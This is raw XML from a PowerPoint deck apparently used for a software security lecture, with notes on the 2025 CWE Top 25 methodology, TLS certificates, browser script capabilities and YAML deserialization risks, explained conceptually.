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handoutMasterIdLst>
    <p:handoutMasterId r:id="rId126"/>
  </p:handoutMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="2147469085" r:id="rId2"/>
    <p:sldId id="418" r:id="rId3"/>
    <p:sldId id="2147469086" r:id="rId4"/>
    <p:sldId id="2147469093" r:id="rId5"/>
    <p:sldId id="414" r:id="rId6"/>
    <p:sldId id="2147469082" r:id="rId7"/>
    <p:sldId id="285" r:id="rId8"/>
    <p:sldId id="283" r:id="rId9"/>
    <p:sldId id="275" r:id="rId10"/>
    <p:sldId id="276" r:id="rId11"/>
    <p:sldId id="277" r:id="rId12"/>
    <p:sldId id="278" r:id="rId13"/>
    <p:sldId id="413" r:id="rId14"/>
    <p:sldId id="2147469084" r:id="rId15"/>
    <p:sldId id="2147468947" r:id="rId16"/>
    <p:sldId id="280" r:id="rId17"/>
    <p:sldId id="281" r:id="rId18"/>
    <p:sldId id="421" r:id="rId19"/>
    <p:sldId id="345" r:id="rId20"/>
    <p:sldId id="346" r:id="rId21"/>
    <p:sldId id="303" r:id="rId22"/>
    <p:sldId id="305" r:id="rId23"/>
    <p:sldId id="306" r:id="rId24"/>
    <p:sldId id="307" r:id="rId25"/>
    <p:sldId id="308" r:id="rId26"/>
    <p:sldId id="309" r:id="rId27"/>
    <p:sldId id="311" r:id="rId28"/>
    <p:sldId id="312" r:id="rId29"/>
    <p:sldId id="314" r:id="rId30"/>
    <p:sldId id="315" r:id="rId31"/>
    <p:sldId id="316" r:id="rId32"/>
    <p:sldId id="317" r:id="rId33"/>
    <p:sldId id="318" r:id="rId34"/>
    <p:sldId id="2147469074" r:id="rId35"/>
    <p:sldId id="357" r:id="rId36"/>
    <p:sldId id="371" r:id="rId37"/>
    <p:sldId id="2147469066" r:id="rId38"/>
    <p:sldId id="2147469061" r:id="rId39"/>
    <p:sldId id="2147469062" r:id="rId40"/>
    <p:sldId id="2147469063" r:id="rId41"/>
    <p:sldId id="2147469064" r:id="rId42"/>
    <p:sldId id="2147469065" r:id="rId43"/>
    <p:sldId id="2147469067" r:id="rId44"/>
    <p:sldId id="2147469068" r:id="rId45"/>
    <p:sldId id="2147469069" r:id="rId46"/>
    <p:sldId id="2147469070" r:id="rId47"/>
    <p:sldId id="2147469071" r:id="rId48"/>
    <p:sldId id="2147469072" r:id="rId49"/>
    <p:sldId id="2147469073" r:id="rId50"/>
    <p:sldId id="2147469098" r:id="rId51"/>
    <p:sldId id="420" r:id="rId52"/>
    <p:sldId id="2147469075" r:id="rId53"/>
    <p:sldId id="383" r:id="rId54"/>
    <p:sldId id="423" r:id="rId55"/>
    <p:sldId id="424" r:id="rId56"/>
    <p:sldId id="425" r:id="rId57"/>
    <p:sldId id="426" r:id="rId58"/>
    <p:sldId id="324" r:id="rId59"/>
    <p:sldId id="313" r:id="rId60"/>
    <p:sldId id="2147469076" r:id="rId61"/>
    <p:sldId id="2147469077" r:id="rId62"/>
    <p:sldId id="2147469078" r:id="rId63"/>
    <p:sldId id="2147469079" r:id="rId64"/>
    <p:sldId id="2147469080" r:id="rId65"/>
    <p:sldId id="2147469097" r:id="rId66"/>
    <p:sldId id="320" r:id="rId67"/>
    <p:sldId id="322" r:id="rId68"/>
    <p:sldId id="323" r:id="rId69"/>
    <p:sldId id="327" r:id="rId70"/>
    <p:sldId id="328" r:id="rId71"/>
    <p:sldId id="286" r:id="rId72"/>
    <p:sldId id="329" r:id="rId73"/>
    <p:sldId id="330" r:id="rId74"/>
    <p:sldId id="331" r:id="rId75"/>
    <p:sldId id="2147469087" r:id="rId76"/>
    <p:sldId id="2147469056" r:id="rId77"/>
    <p:sldId id="2147469096" r:id="rId78"/>
    <p:sldId id="2147469095" r:id="rId79"/>
    <p:sldId id="332" r:id="rId80"/>
    <p:sldId id="333" r:id="rId81"/>
    <p:sldId id="334" r:id="rId82"/>
    <p:sldId id="335" r:id="rId83"/>
    <p:sldId id="336" r:id="rId84"/>
    <p:sldId id="362" r:id="rId85"/>
    <p:sldId id="402" r:id="rId86"/>
    <p:sldId id="337" r:id="rId87"/>
    <p:sldId id="338" r:id="rId88"/>
    <p:sldId id="339" r:id="rId89"/>
    <p:sldId id="2147469052" r:id="rId90"/>
    <p:sldId id="2147469090" r:id="rId91"/>
    <p:sldId id="2147469059" r:id="rId92"/>
    <p:sldId id="2147469091" r:id="rId93"/>
    <p:sldId id="2147468792" r:id="rId94"/>
    <p:sldId id="2147469088" r:id="rId95"/>
    <p:sldId id="2147469060" r:id="rId96"/>
    <p:sldId id="2147469092" r:id="rId97"/>
    <p:sldId id="2147469089" r:id="rId98"/>
    <p:sldId id="341" r:id="rId99"/>
    <p:sldId id="2147469081" r:id="rId100"/>
    <p:sldId id="284" r:id="rId101"/>
    <p:sldId id="2147469083" r:id="rId102"/>
    <p:sldId id="2147468950" r:id="rId103"/>
    <p:sldId id="2147468952" r:id="rId104"/>
    <p:sldId id="2147468953" r:id="rId105"/>
    <p:sldId id="2147468954" r:id="rId106"/>
    <p:sldId id="374" r:id="rId107"/>
    <p:sldId id="376" r:id="rId108"/>
    <p:sldId id="377" r:id="rId109"/>
    <p:sldId id="378" r:id="rId110"/>
    <p:sldId id="379" r:id="rId111"/>
    <p:sldId id="380" r:id="rId112"/>
    <p:sldId id="381" r:id="rId113"/>
    <p:sldId id="382" r:id="rId114"/>
    <p:sldId id="384" r:id="rId115"/>
    <p:sldId id="385" r:id="rId116"/>
    <p:sldId id="386" r:id="rId117"/>
    <p:sldId id="387" r:id="rId118"/>
    <p:sldId id="388" r:id="rId119"/>
    <p:sldId id="389" r:id="rId120"/>
    <p:sldId id="390" r:id="rId121"/>
    <p:sldId id="391" r:id="rId122"/>
    <p:sldId id="399" r:id="rId123"/>
    <p:sldId id="344" r:id="rId1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2A"/>
    <a:srgbClr val="00B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19"/>
    <p:restoredTop sz="80816"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0" snapToObjects="1">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="44" d="100"/>
          <a:sy n="44" d="100"/>
        </p:scale>
        <p:origin x="296" y="520"/>
      </p:cViewPr>
      <p:guideLst>
        <p:guide orient="horz" pos="4320"/>
        <p:guide pos="76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E0C287-5CA2-3444-9089-D02DE3E4A4BA}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>1/20/26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A7101A-AAF7-C24C-86B3-AD69ABE06711}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="40085073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1143000" y="685800"/>
            <a:ext cx="4572000" cy="3429000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="191" name="Shape 19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19718216"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMap bg1="lt1" tx1="dk1" bg2="lt2" tx2="dk2" accent1="accent1" accent2="accent2" accent3="accent3" accent4="accent4" accent5="accent5" accent6="accent6" hlink="hlink" folHlink="folHlink"/>
  <p:hf hdr="0" ftr="0" dt="0"/>
  <p:notesStyle>
    <a:lvl1pPr defTabSz="457200" latinLnBrk="0">
      <a:lnSpc>
        <a:spcPct val="125000"/>
      </a:lnSpc>
      <a:defRPr sz="3200">
        <a:latin typeface="Avenir"/>
        <a:ea typeface="Avenir"/>
        <a:cs typeface="Avenir"/>
        <a:sym typeface="Avenir Roman"/>
      </a:defRPr>
    </a:lvl1pPr>
    <a:lvl2pPr indent="228600" defTabSz="457200" latinLnBrk="0">
      <a:lnSpc>
        <a:spcPct val="125000"/>
      </a:lnSpc>
      <a:defRPr sz="3200">
        <a:latin typeface="Avenir"/>
        <a:ea typeface="Avenir"/>
        <a:cs typeface="Avenir"/>
        <a:sym typeface="Avenir Roman"/>
      </a:defRPr>
    </a:lvl2pPr>
    <a:lvl3pPr indent="457200" defTabSz="457200" latinLnBrk="0">
      <a:lnSpc>
        <a:spcPct val="125000"/>
      </a:lnSpc>
      <a:defRPr sz="3200">
        <a:latin typeface="Avenir"/>
        <a:ea typeface="Avenir"/>
        <a:cs typeface="Avenir"/>
        <a:sym typeface="Avenir Roman"/>
      </a:defRPr>
    </a:lvl3pPr>
    <a:lvl4pPr indent="685800" defTabSz="457200" latinLnBrk="0">
      <a:lnSpc>
        <a:spcPct val="125000"/>
      </a:lnSpc>
      <a:defRPr sz="3200">
        <a:latin typeface="Avenir"/>
        <a:ea typeface="Avenir"/>
        <a:cs typeface="Avenir"/>
        <a:sym typeface="Avenir Roman"/>
      </a:defRPr>
    </a:lvl4pPr>
    <a:lvl5pPr indent="914400" defTabSz="457200" latinLnBrk="0">
      <a:lnSpc>
        <a:spcPct val="125000"/>
      </a:lnSpc>
      <a:defRPr sz="3200">
        <a:latin typeface="Avenir"/>
        <a:ea typeface="Avenir"/>
        <a:cs typeface="Avenir"/>
        <a:sym typeface="Avenir Roman"/>
      </a:defRPr>
    </a:lvl5pPr>
    <a:lvl6pPr indent="1143000" defTabSz="457200" latinLnBrk="0">
      <a:lnSpc>
        <a:spcPct val="125000"/>
      </a:lnSpc>
      <a:defRPr sz="3200">
        <a:latin typeface="Avenir"/>
        <a:ea typeface="Avenir"/>
        <a:cs typeface="Avenir"/>
        <a:sym typeface="Avenir Roman"/>
      </a:defRPr>
    </a:lvl6pPr>
    <a:lvl7pPr indent="1371600" defTabSz="457200" latinLnBrk="0">
      <a:lnSpc>
        <a:spcPct val="125000"/>
      </a:lnSpc>
      <a:defRPr sz="3200">
        <a:latin typeface="Avenir"/>
        <a:ea typeface="Avenir"/>
        <a:cs typeface="Avenir"/>
        <a:sym typeface="Avenir Roman"/>
      </a:defRPr>
    </a:lvl7pPr>
    <a:lvl8pPr indent="1600200" defTabSz="457200" latinLnBrk="0">
      <a:lnSpc>
        <a:spcPct val="125000"/>
      </a:lnSpc>
      <a:defRPr sz="3200">
        <a:latin typeface="Avenir"/>
        <a:ea typeface="Avenir"/>
        <a:cs typeface="Avenir"/>
        <a:sym typeface="Avenir Roman"/>
      </a:defRPr>
    </a:lvl8pPr>
    <a:lvl9pPr indent="1828800" defTabSz="457200" latinLnBrk="0">
      <a:lnSpc>
        <a:spcPct val="125000"/>
      </a:lnSpc>
      <a:defRPr sz="3200">
        <a:latin typeface="Avenir"/>
        <a:ea typeface="Avenir"/>
        <a:cs typeface="Avenir"/>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ahoo.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we.mitre.org/community/working_groups.html#rcm_w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8255E-1366-54CF-4881-F5D370008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56203-743E-AED5-B194-DFD83C1CD7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13B8D1-E063-2239-3FE4-BBE7924B0C0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This year’s dataset included 39,080 CVE Records for vulnerabilities published between June 1, 2024 and June 1, 2025.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" defTabSz="457200" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="125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Scores are based on product of Frequency (#CVEs) and Severity (CVSS); max score is 100</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>See https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>www.first.org</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>cvss</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>/v4.0/specification-document for CVSS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" defTabSz="457200" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="125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Note: CVSS scores are between 0 and 10</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>See https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>www.cisa.gov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>/known-exploited-vulnerabilities-catalog for KEV</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>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C5FC3D09-E514-EBEB-0AB2-4ED5711F32B9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C123C96B-2B3F-7242-90A1-56E5F222F20D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>3</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2235785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104</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="155645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certificate includes the identity of the server (e.g. website domain), a temporal validity period, a public key, and a digital signature provided by a trusted third party.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C123C96B-2B3F-7242-90A1-56E5F222F20D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>105</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="33784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77508-A478-84D8-4DE6-E64CEBF11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473F4-D30E-9E17-18EB-2D092B89731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018385-5A94-C33F-1ECE-4649A5E9D0AF}"/>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This year’s dataset included 39,080 CVE Records for vulnerabilities published between June 1, 2024 and June 1, 2025.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>cwe.mitre.org</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/top25/archive/2025/2025_methodology.html</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Note: CVSS scores are between 0 and 10</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>The 2025 CWE Top 25 was the first to also employ CWE mapping suggestions from an LLM tool developed by Chris Madden (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>Yahoo!</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>) as part of the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>CWE Root Cause Mapping Working Group</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> (RCM WG).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>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3B0C82D1-7042-C233-B217-771F7E20F9F0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C123C96B-2B3F-7242-90A1-56E5F222F20D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>18</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="219782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Scripts are </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Helvetica"/>
                <a:ea typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>executed by the browser</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>.  They can:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Helvetica"/>
                <a:ea typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>Alter page contents</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="020000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(DOM objects)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Helvetica"/>
                <a:ea typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>Track events</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (mouse clicks, motion, keystrokes)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Helvetica"/>
                <a:ea typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>Issue web requests</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> &amp; read replies</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Helvetica"/>
                <a:ea typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>Maintain persistent connections</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (AJAX)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr b="1">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Helvetica"/>
                <a:ea typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Read and set cookies</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="112409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Deserialization is the process of converting a byte-level representation into an internal object</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Some standard file formats, such as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Yaml</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, can be used to define serialized objects</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Thus, if an attacker can corrupt such a file, it can manipulate the application</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>To read and act on data the attacker provides, e.g., to bypass authorization</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Yaml</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> files can include executable representations, so deserialization can also cause remote code execution</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="364881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DE33A-DB6D-DD30-6AC2-AFEFFFE5C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12B84-7037-F35C-4583-239DA91DDC6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5274BA9-C017-A801-234F-E458210E55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1D3F57-4E01-147E-51C5-FF0675872909}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C123C96B-2B3F-7242-90A1-56E5F222F20D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>89</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="195205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3C399-EC9A-C7D2-0E53-20B4E0787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C19F7-67C7-759E-4558-17D6EDDF5E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636D858-782C-99DA-E00E-CC0259F2D3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DD889A-388A-5267-6707-99CAF7A9CE11}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
